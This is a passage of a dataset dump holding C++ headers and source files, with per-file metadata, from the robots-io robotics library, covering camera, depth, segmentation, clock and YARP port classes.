const bool provide_rgb_;\n\n cv::Mat cv_rgb_out_;\n yarp::sig::ImageOf<yarp::sig::PixelRgb> yarp_rgb_out_;\n\n cv::Mat cv_mask_in_;\n yarp::sig::ImageOf<yarp::sig::PixelMono> yarp_mask_in_;\n double time_stamp_mask_in_;\n\n const std::string log_name_ = \"SegmentationYarpPort\";\n};\n\n#endif /* ROBOTSIO_SEGMENTATIONYARPPORT_H */\n"
},
{
"alpha_fraction": 0.7196261882781982,
"alphanum_fraction": 0.7313084006309509,
"avg_line_length": 19.380952835083008,
"blob_id": "a2e194f6e725c3783c412a02c1de0fe8732261f1",
"content_id": "ea61dbfd56d4e7a762847f977b2d095a48cbaa4c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 428,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 21,
"path": "/src/RobotsIO/src/Utils/FloatMatrix.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/FloatMatrix.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\n\n\nFloatMatrix::~FloatMatrix()\n{}\n\n\nMatrixXd FloatMatrix::matrix_as_double()\n{\n return matrix().cast<double>();\n}\n"
},
{
"alpha_fraction": 0.6570833325386047,
"alphanum_fraction": 0.6658333539962769,
"avg_line_length": 24,
"blob_id": "878835db470178f2315f279088ea60d07b63b10c",
"content_id": "e0360f91427f4c48298b4a427684cc01de1b366a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2400,
"license_type": "permissive",
"max_line_length": 415,
"num_lines": 96,
"path": "/src/RobotsIO/include/RobotsIO/Camera/iCubCameraDepth.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_ICUBCAMERADEPTH_H\n#define ROBOTSIO_ICUBCAMERADEPTH_H\n\n#include <RobotsIO/Camera/iCubCameraRelative.h>\n\n#include <Eigen/Dense>\n\n#include <opencv2/opencv.hpp>\n\n#include <string>\n\nnamespace RobotsIO {\n namespace Camera {\n class iCubCameraDepth;\n }\n}\n\n\nclass RobotsIO::Camera::iCubCameraDepth : public RobotsIO::Camera::iCubCameraRelative\n{\npublic:\n\n iCubCameraDepth(const std::string& robot_name, const std::string& port_prefix, const bool& use_calibration = false, const std::string& calibration_path = \"\");\n\n iCubCameraDepth(const std::string& data_path_left, const std::string& data_path_right, const std::size_t& width, const std::size_t& height, const double& fx_l, const double& cx_l, const double& fy_l, const double& cy_l, const double& fx_r, const double& cx_r, const double& fy_r, const double& cy_r, const bool& load_encoders_data, const bool& use_calibration = false, const std::string& calibration_path = \"\");\n\n ~iCubCameraDepth();\n\n /**\n * Camera parameters.\n */\n\n std::pair<bool, Eigen::MatrixXd> deprojection_matrix() const override;\n\n /**\n * RGB-D and pose.\n */\n\n std::pair<bool, Eigen::MatrixXf> depth(const bool& blocking) override;\n\n std::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> pose(const bool& blocking) override;\n\n std::pair<bool, cv::Mat> rgb(const bool& blocking) override;\n\nprivate:\n /**\n * Storage required for stereo matching with OpenCV.\n */\n\n void configure_sgbm();\n\n cv::Mat intrinsic_left_;\n\n cv::Mat distortion_left_;\n\n cv::Mat intrinsic_right_;\n\n cv::Mat distortion_right_;\n\n cv::Ptr<cv::StereoSGBM> sgbm_;\n\n /**\n * Parameters for OpenCV SGBM.\n * TODO: put them in the constructor somehow\n */\n int uniqueness_ratio_ = 15;\n\n int speckle_window_size_ = 50;\n\n int speckle_range_ = 1;\n\n int number_of_disparities_ = 96;\n\n int block_size_ = 7;\n\n int min_disparity_ = 0;\n\n int pre_filter_cap_ = 63;\n\n int disp_12_max_diff_ = 0;\n\n /**\n * Log name to be used in messages printed by the class.\n */\n\n const std::string log_name_ = \"iCubCameraDepth\";\n};\n\n#endif /* ROBOTSIO_ICUBCAMERADEPTH_H */\n"
},
{
"alpha_fraction": 0.7132866978645325,
"alphanum_fraction": 0.7242757081985474,
"avg_line_length": 16.875,
"blob_id": "cc12c948986149e96a35248e50ae2e72d1bed739",
"content_id": "05fb14d9973a1afb52d909101b692ddf0ca9dca6",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1001,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 56,
"path": "/src/RobotsIO/src/Camera/CameraParameters.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Camera/CameraParameters.h>\n\nusing namespace RobotsIO::Camera;\n\nrobots_io_accessor_impl(CameraParameters);\n\n\nrobots_io_declare_field_impl(CameraParameters, int, width);\n\n\nrobots_io_declare_field_impl(CameraParameters, int, height);\n\n\nrobots_io_declare_field_impl(CameraParameters, double, cx);\n\n\nrobots_io_declare_field_impl(CameraParameters, double, cy);\n\n\nrobots_io_declare_field_impl(CameraParameters, double, fx);\n\n\nrobots_io_declare_field_impl(CameraParameters, double, fy);\n\n\nrobots_io_declare_field_impl(CameraParameters, bool, initialized);\n\n\nCameraParameters::CameraParameters()\n{\n /* Set default values. */\n width(0);\n\n height(0);\n\n cx(0);\n\n cy(0);\n\n fx(0);\n\n fy(0);\n\n initialized(false);\n}\n\n\nCameraParameters::~CameraParameters()\n{}\n"
},
{
"alpha_fraction": 0.6939182281494141,
"alphanum_fraction": 0.6999002695083618,
"avg_line_length": 22.325580596923828,
"blob_id": "9e430d91cbd1a96311a8634d8ac3128c281adbee",
"content_id": "2e5a5a52dd330e4700eaf67b3d761bd977eb28aa",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1003,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 43,
"path": "/src/RobotsIO/include/RobotsIO/Utils/DatasetDetection.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_DATASETDETECTION_H\n#define ROBOTSIO_DATASETDETECTION_H\n\n#include <Eigen/Dense>\n\n#include <RobotsIO/Utils/DatasetDataStream.h>\n#include <RobotsIO/Utils/Detection.h>\n\n#include <opencv2/opencv.hpp>\n\nnamespace RobotsIO {\n namespace Utils {\n class DatasetDetection;\n }\n}\n\n\nclass RobotsIO::Utils::DatasetDetection : public RobotsIO::Utils::DatasetDataStream,\n public RobotsIO::Utils::Detection\n{\npublic:\n DatasetDetection(const std::string& file_path);\n\n virtual ~DatasetDetection();\n\n bool freeze(const bool blocking = false) override;\n\n cv::Rect detection() const override;\n\nprivate:\n cv::Rect detection_;\n\n const std::string log_name_ = \"DatasetDetection\";\n};\n\n#endif /* ROBOTSIO_DATASETDETECTION_H */\n"
},
{
"alpha_fraction": 0.7257257103919983,
"alphanum_fraction": 0.7347347140312195,
"avg_line_length": 22.23255729675293,
"blob_id": "257201ed85b47aa7faf9a6ad32ce29cbf043256e",
"content_id": "8675ec8f2727c4b4cdeec178448cf4836c2e37a9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 999,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 43,
"path": "/src/RobotsIO/include/RobotsIO/Utils/SpatialVelocityBuffer.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_SPATIALVELOCITYBUFFER_H\n#define ROBOTSIO_SPATIALVELOCITYBUFFER_H\n\n#include <Eigen/Dense>\n\n#include <RobotsIO/Utils/SpatialVelocity.h>\n\nnamespace RobotsIO {\n namespace Utils {\n class SpatialVelocityBuffer;\n }\n}\n\n\nclass RobotsIO::Utils::SpatialVelocityBuffer : public RobotsIO::Utils::SpatialVelocity\n{\npublic:\n SpatialVelocityBuffer();\n\n virtual ~SpatialVelocityBuffer();\n\n bool freeze(const bool blocking) override;\n\n void set_twist(const Eigen::Vector3d& linear_velocity, const Eigen::Vector3d& angular_velocity, const double& elapsed_time = 0.0);\n\n double elapsed_time() override;\n\nprotected:\n Eigen::VectorXd twist() override;\n\n Eigen::VectorXd twist_;\n\n double elapsed_time_;\n};\n\n#endif /* ROBOTSIO_SPATIALVELOCITYBUFFER_H */\n"
},
{
"alpha_fraction": 0.7037814855575562,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 24.052631378173828,
"blob_id": "334475dc780cda59cfcfe531469caa1918feeb00",
"content_id": "fa25a9fc86ca2bd1e5d2b3555bf45243acaebf3f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 476,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 19,
"path": "/src/RobotsIO/include/RobotsIO/Utils/FileToDepth.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_FILETODEPTH_H\n#define ROBOTSIO_FILETODEPTH_H\n\n#include <Eigen/Dense>\n\nnamespace RobotsIO {\n namespace Utils {\n std::pair<bool, Eigen::MatrixXf> file_to_depth(const std::string& file_path);\n }\n}\n\n#endif /* ROBOTSIO_FILETODEPTH_H */\n"
},
{
"alpha_fraction": 0.6587905287742615,
"alphanum_fraction": 0.6611934304237366,
"avg_line_length": 18.97599983215332,
"blob_id": "4508c4242990f670f59e2a4cb7205a2f55e1b7be",
"content_id": "08e8809759756fdd5e51409475f23573ae71b5be",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2497,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 125,
"path": "/src/RobotsIO/include/RobotsIO/Utils/YarpBufferedPort.hpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_YARPBUFFEREDPORT_H\n#define ROBOTSIO_YARPBUFFEREDPORT_H\n\n#include <yarp/os/BufferedPort.h>\n#include <yarp/os/Network.h>\n#include <yarp/os/Stamp.h>\n\n#include <string>\n#include <unordered_map>\n\nnamespace RobotsIO {\n namespace Utils {\n template<class T>\n class YarpBufferedPort;\n }\n}\n\n\ntemplate<class T>\nclass RobotsIO::Utils::YarpBufferedPort\n{\npublic:\n YarpBufferedPort(const std::string& port_name);\n\n virtual ~YarpBufferedPort();\n\n void send_data(const T& data);\n\n T* receive_data(const bool& blocking);\n\n double time_stamp();\n\n void set_time_stamp(const double& stamp);\n\n std::size_t flush();\n\nprotected:\n yarp::os::Network yarp_;\n\n yarp::os::BufferedPort<T> port_;\n\n yarp::os::Stamp stamp_;\n\n const std::string log_name_ = \"YarpBufferedPort\";\n};\n\n\ntemplate<class T>\nRobotsIO::Utils::YarpBufferedPort<T>::YarpBufferedPort(const std::string& port_name)\n{\n if (!yarp_.checkNetwork())\n {\n throw(std::runtime_error(log_name_ + \"::ctor. Error: YARP network is not available.\"));\n }\n\n if(!port_.open(port_name))\n {\n throw(std::runtime_error(log_name_ + \"::ctor. Error: cannot open port \" + port_name + \".\"));\n }\n}\n\n\ntemplate <class T>\nRobotsIO::Utils::YarpBufferedPort<T>::~YarpBufferedPort()\n{\n if(!(port_.isClosed()))\n port_.close();\n}\n\n\ntemplate <class T>\nvoid RobotsIO::Utils::YarpBufferedPort<T>::send_data(const T& data)\n{\n T& data_to_be_sent = port_.prepare();\n\n port_.setEnvelope(stamp_);\n\n data_to_be_sent = data;\n\n port_.write();\n}\n\n\ntemplate <class T>\nT* RobotsIO::Utils::YarpBufferedPort<T>::receive_data(const bool& blocking)\n{\n return port_.read(blocking);\n}\n\n\ntemplate <class T>\ndouble RobotsIO::Utils::YarpBufferedPort<T>::time_stamp()\n{\n yarp::os::Stamp stamp;\n port_.getEnvelope(stamp);\n\n return stamp.getTime();\n}\n\n\ntemplate <class T>\nvoid RobotsIO::Utils::YarpBufferedPort<T>::set_time_stamp(const double& stamp)\n{\n stamp_.update(stamp);\n}\n\n\ntemplate <class T>\nstd::size_t RobotsIO::Utils::YarpBufferedPort<T>::flush()\n{\n std::size_t pending_reads = port_.getPendingReads();\n for (std::size_t i = 0; i < pending_reads; i++)\n port_.read(false);\n\n return pending_reads;\n}\n\n#endif /* ROBOTSIO_YARPBUFFEREDPORT_H */\n"
},
{
"alpha_fraction": 0.6788710951805115,
"alphanum_fraction": 0.6845918893814087,
"avg_line_length": 31.370370864868164,
"blob_id": "9a748001f9ac3fd2af50210aca47f3330f341738",
"content_id": "5d7da68bf5b29abb670e4f0449a3ec52e8563937",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2622,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 81,
"path": "/src/RobotsIO/include/RobotsIO/Utils/Transform.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_TRANSFORM_H\n#define ROBOTSIO_TRANSFORM_H\n\n#include <RobotsIO/Utils/DataStream.h>\n\n#include <opencv2/opencv.hpp>\n\n#include <Eigen/Dense>\n\nnamespace RobotsIO {\n namespace Utils {\n class Transform;\n }\n}\n\n\nclass RobotsIO::Utils::Transform : public RobotsIO::Utils::DataStream\n{\npublic:\n virtual ~Transform();\n\n virtual Eigen::Transform<double, 3, Eigen::Affine> transform() = 0;\n\n /**\n * FIXME: this might be moved somewhere else.\n *\n * Optionally, a transform might contain information on the bounding box enclosing the object\n * whose transform is transmitted.\n *\n * It returns a 3x8 matrix containing the coordinates of the 8 vertices of the bounding box.\n *\n * The points of the bounding box are to be expressed in the root frame of the transformation.\n */\n virtual Eigen::MatrixXd bounding_box();\n\n /**\n * N > 1 indicates that the transform is available every N frames\n * N = 1 indicates that the transform is available at all frames\n * N < 1 indicates that this information is not available\n *\n * By default, this method returns N = 1. User might override this setting by re-implementing this method.\n */\n virtual int get_frames_between_iterations() const;\n\n /**\n * If required, the user might override this method to set the RGB image\n * on which the transform has to be evaluated.\n */\n virtual void set_rgb_image(const cv::Mat& image);\n\n /**\n * If required, the user might override this method to set the Depth / Segmentation pair\n * on which the transform has to be evaluated.\n */\n virtual void set_depth_segmentation_image(const Eigen::MatrixXf& depth, const cv::Mat& segmentation);\n\n /**\n * Indicate whether a new transform has been received or not.\n * Please note that this method might return true even if\n * DataStream::freeze() is false, e.g. if the transform is invalid.\n *\n * User might override this method in order to comunicate\n * when a network-based transform source is ready,\n * independently from the validity of the received transform.\n *\n * The default returned value is True.\n *\n * Warning: this method should be called after DataStream::freeze(),\n * as the reception status might be updated after that.\n */\n virtual bool transform_received();\n};\n\n#endif /* ROBOTSIO_TRANSFORM_H */\n"
},
{
"alpha_fraction": 0.6643741130828857,
"alphanum_fraction": 0.6781293153762817,
"avg_line_length": 17.64102554321289,
"blob_id": "a1509331ca4358d31a5f961bc87e96f39ca3b415",
"content_id": "42c8708d5b86554ffb6d1acf5b9214a492ade1ad",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 727,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 39,
"path": "/src/RobotsIO/src/Utils/ClockYarp.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/ClockYarp.h>\n\n#include <stdexcept>\n\n#include <yarp/os/Time.h>\n\nusing namespace RobotsIO::Utils;\n\n\nClockYarp::ClockYarp()\n{\n if (!yarp_.checkNetwork())\n {\n throw(std::runtime_error(log_name_ + \"::ctor. Error: YARP network is not available.\"));\n }\n}\n\n\nClockYarp::~ClockYarp()\n{}\n\n\ndouble ClockYarp::now() const\n{\n return yarp::os::Time::now();\n}\n\n\nvoid ClockYarp::delay(const int& milliseconds) const\n{\n return yarp::os::Time::delay(double(milliseconds) / 1000.0);\n}\n"
},
{
"alpha_fraction": 0.6788432002067566,
"alphanum_fraction": 0.6844241619110107,
"avg_line_length": 25.635135650634766,
"blob_id": "b56ceaea0ae2ad965848a019086e6925bd635fb5",
"content_id": "cca0eeb2b925939c15371f8b35c8a7345e2e1b0e",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1971,
"license_type": "permissive",
"max_line_length": 146,
"num_lines": 74,
"path": "/src/RobotsIO/include/RobotsIO/Camera/SegmentationCamera.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_SEGMENTATIONCAMERA_H\n#define ROBOTSIO_SEGMENTATIONCAMERA_H\n\n#include <RobotsIO/Camera/Camera.h>\n#include <RobotsIO/Camera/CameraParameters.h>\n#include <RobotsIO/Utils/Transform.h>\n\n#include <SuperimposeMesh/SICAD.h>\n\n#include <Eigen/Dense>\n\n\nnamespace RobotsIO {\n namespace Camera {\n class SegmentationCamera;\n }\n}\n\n\n\nclass RobotsIO::Camera::SegmentationCamera\n{\npublic:\n SegmentationCamera(const RobotsIO::Camera::CameraParameters& camera_parameters, const std::string& mesh_path, const double& threshold = 0.01);\n\n ~SegmentationCamera();\n\n void add_object();\n\n /**\n * Segmentation mask given a depth image and an object Eigen::Transform<double, 3, Affine>\n */\n std::pair<bool, cv::Mat> mask(const Eigen::MatrixXf& scene_depth, const Eigen::Transform<double, 3, Eigen::Affine> object_transform);\n\n /**\n * Segmentation mask given a RobotsIO::Camera::Camera and a RobotsIO::Utils::Transform\n */\n std::pair<bool, cv::Mat> mask(std::shared_ptr<RobotsIO::Camera::Camera> camera, std::shared_ptr<RobotsIO::Utils::Transform> object_transform);\n\nprivate:\n /**\n * Rendering method.\n */\n std::pair<bool, cv::Mat> render_mask(const Eigen::MatrixXf& scene_depth, const Eigen::Transform<double, 3, Eigen::Affine> object_transform);\n\n /**\n * Object renderer.\n */\n std::unique_ptr<SICAD> renderer_;\n\n /**\n * Camera parameters.\n */\n RobotsIO::Camera::CameraParameters parameters_;\n\n /**\n * Threshold for depth/rendered depth comparison.\n */\n const double threshold_;\n\n /**\n * Log name to be used in messages printed by the class.\n */\n const std::string log_name_ = \"SegmentationCamera\";\n};\n\n#endif /* ROBOTSIO_SEGMENTATIONCAMERA_H */\n"
},
{
"alpha_fraction": 0.6411926746368408,
"alphanum_fraction": 0.646955668926239,
"avg_line_length": 21.548023223876953,
"blob_id": "54f536e17b8a03127ef1afe633437048137a8edf",
"content_id": "c57976cccea4ddbbd46e145efe610ae1e3319c16",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3991,
"license_type": "permissive",
"max_line_length": 221,
"num_lines": 177,
"path": "/src/RobotsIO/include/RobotsIO/Camera/Camera.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_CAMERA_H\n#define ROBOTSIO_CAMERA_H\n\n#include <RobotsIO/Camera/CameraParameters.h>\n#include <RobotsIO/Camera/DatasetParameters.h>\n#include <RobotsIO/Utils/ProbeContainer.h>\n\n#include <Eigen/Dense>\n\n#include <limits>\n#include <opencv2/opencv.hpp>\n\n#include <cstdint>\n#include <fstream>\n#include <string>\n\nnamespace RobotsIO {\n namespace Camera {\n class Camera;\n }\n}\n\n\nclass RobotsIO::Camera::Camera : public RobotsIO::Utils::ProbeContainer\n{\npublic:\n Camera();\n\n virtual ~Camera();\n\n virtual bool status() const;\n\n virtual bool reset();\n\n /**\n * Camera parameters.\n */\n\n virtual std::pair<bool, Eigen::MatrixXd> deprojection_matrix() const;\n\n virtual std::pair<bool, RobotsIO::Camera::CameraParameters> parameters() const;\n\n /**\n * RGB-D and pose.\n */\n\n virtual std::pair<bool, Eigen::MatrixXf> depth(const bool& blocking) = 0;\n\n virtual std::pair<bool, Eigen::MatrixXd> point_cloud(const bool& blocking, const double& maximum_depth = std::numeric_limits<double>::infinity(), const bool& use_root_frame = false, const bool& enable_colors = false);\n\n virtual std::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> pose(const bool& blocking) = 0;\n\n virtual std::pair<bool, cv::Mat> rgb(const bool& blocking) = 0;\n\n virtual std::pair<bool, double> time_stamp_rgb() const;\n\n virtual std::pair<bool, double> time_stamp_depth() const;\n\n /**\n * Auxiliary data.\n */\n\n virtual std::pair<bool, Eigen::VectorXd> auxiliary_data(const bool& blocking);\n\n virtual std::size_t auxiliary_data_size() const;\n\n /**\n * Offline playback.\n */\n\n virtual std::int32_t frame_index() const;\n\n virtual bool is_offline() const;\n\n virtual bool set_frame_index(const std::int32_t& index);\n\n virtual bool step_frame();\n\n /**\n * Logging.\n */\n\n virtual bool log_frame(const bool& log_depth = false);\n\n virtual bool start_log(const std::string& path);\n\n virtual bool stop_log();\n\nprotected:\n virtual bool initialize();\n\n bool status_ = true;\n\n /**\n * Camera parameters.\n */\n\n virtual bool evaluate_deprojection_matrix();\n\n RobotsIO::Camera::CameraParameters parameters_;\n\n Eigen::MatrixXd deprojection_matrix_;\n\n bool deprojection_matrix_initialized_ = false;\n\n /**\n * Constructor for offline playback.\n */\n Camera(const std::string& data_path, const std::size_t& width, const std::size_t& height, const double& fx, const double& cx, const double& fy, const double& cy);\n\n /**\n * RGB-D and pose for offline playback.\n */\n\n virtual std::pair<bool, Eigen::MatrixXf> depth_offline();\n\n virtual std::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> pose_offline();\n\n virtual std::pair<bool, cv::Mat> rgb_offline();\n\n virtual std::pair<bool, double> time_stamp_rgb_offline() const;\n\n virtual std::pair<bool, double> time_stamp_depth_offline() const;\n\n /**\n * Auxiliary data for offline playback.\n */\n\n virtual std::pair<bool, Eigen::VectorXd> auxiliary_data_offline();\n\n /*\n * Offline playback.\n */\n\n std::string compose_index(const std::size_t& index);\n\n virtual std::pair<bool, Eigen::MatrixXd> load_data();\n\n RobotsIO::Camera::DatasetParameters dataset_parameters_;\n\n const bool offline_mode_ = false;\n\n Eigen::MatrixXd data_;\n\n std::int32_t frame_index_ = -1;\n\n std::size_t rgb_offset_ = 0;\n\n std::size_t depth_offset_ = 0;\n\n std::size_t number_frames_;\n\n /*\n * Data logging.\n */\n\n std::ofstream log_;\n\n std::string log_path_;\n\n std::int32_t log_index_ = 0;\n\n /**\n * Log name to be used in messages printed by the class.\n */\n\n const std::string log_name_ = \"Camera\";\n};\n\n#endif /* ROBOTSIO_CAMERA_H */\n"
},
{
"alpha_fraction": 0.6921348571777344,
"alphanum_fraction": 0.7011235952377319,
"avg_line_length": 22.421052932739258,
"blob_id": "800c1714f21966a3e2586e8d0707fdffc6336c9d",
"content_id": "97b50b6a9fab944ce36d39864be2b9a966c52f59",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1335,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 57,
"path": "/src/RobotsIO/src/Utils/SpatialVelocityYarpPort.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/SpatialVelocityYarpPort.h>\n\n#include <yarp/eigen/Eigen.h>\n#include <yarp/sig/Vector.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\nusing namespace yarp::eigen;\nusing namespace yarp::sig;\n\n\nSpatialVelocityYarpPort::SpatialVelocityYarpPort(const std::string& port_name) :\n YarpVectorOfProbe<double>(port_name)\n{}\n\n\nSpatialVelocityYarpPort:: ~SpatialVelocityYarpPort()\n{}\n\n\nbool SpatialVelocityYarpPort::freeze(const bool blocking)\n{\n /* Data reception .*/\n yarp::sig::Vector* velocity_yarp = receive_data(blocking);\n if (velocity_yarp == nullptr)\n return false;\n\n /* Elapsed time. */\n elapsed_time_ = 0.0;\n auto now = std::chrono::steady_clock::now();\n if (last_time_initialized_)\n elapsed_time_ = std::chrono::duration_cast<std::chrono::milliseconds>(now - last_time_).count() / 1000.0;\n last_time_ = now;\n last_time_initialized_ = true;\n\n twist_ = toEigen(*velocity_yarp);\n\n return true;\n}\n\ndouble SpatialVelocityYarpPort::elapsed_time()\n{\n return elapsed_time_;\n}\n\n\nVectorXd SpatialVelocityYarpPort::twist()\n{\n return twist_;\n}\n"
},
{
"alpha_fraction": 0.6995581984519958,
"alphanum_fraction": 0.7069219350814819,
"avg_line_length": 20.90322494506836,
"blob_id": "3429b2739a3548fa98dbcd9b7544e89be728413e",
"content_id": "6f38f0495ba10b787dafcb1d7ec7368b34dd7c92",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 679,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 31,
"path": "/src/RobotsIO/src/Utils/Clock.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/Clock.h>\n\n#include <chrono>\n#include <thread>\n\nusing namespace RobotsIO::Utils;\n\n\nClock::~Clock()\n{}\n\n\ndouble Clock::now() const\n{\n auto current_time = std::chrono::steady_clock::now();\n auto since_epoch = std::chrono::duration<double>(current_time.time_since_epoch());\n return since_epoch.count();\n}\n\n\nvoid Clock::delay(const int& milliseconds) const\n{\n std::this_thread::sleep_for(std::chrono::milliseconds(milliseconds));\n}\n"
},
{
"alpha_fraction": 0.7065026164054871,
"alphanum_fraction": 0.7152900099754333,
"avg_line_length": 28.947368621826172,
"blob_id": "9aa676d6b58bc60bfd8e667c8fb5ff8bcb434631",
"content_id": "a1b33c9f06f6e3eed1751808ff3de131be4eec56",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 569,
"license_type": "permissive",
"max_line_length": 178,
"num_lines": 19,
"path": "/src/RobotsIO/include/RobotsIO/Utils/FileToEigen.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_FILETOEIGEN_H\n#define ROBOTSIO_FILETOEIGEN_H\n\n#include <Eigen/Dense>\n\nnamespace RobotsIO {\n namespace Utils {\n std::pair<bool, Eigen::MatrixXd> file_to_eigen(const std::string& file_path, const std::size_t& skip_rows, const std::size_t skip_cols, const std::size_t& expected_cols);\n }\n}\n\n#endif /* ROBOTSIO_FILETOEIGEN_H */\n"
},
{
"alpha_fraction": 0.7003567218780518,
"alphanum_fraction": 0.7146254181861877,
"avg_line_length": 20.564102172851562,
"blob_id": "6f55c17bbaa07bb391fe40c7954df623d1fb4997",
"content_id": "d60df94dbdfc30740c997753f45def33ff45d8e8",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 841,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 39,
"path": "/src/RobotsIO/src/Utils/DatasetDetection.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
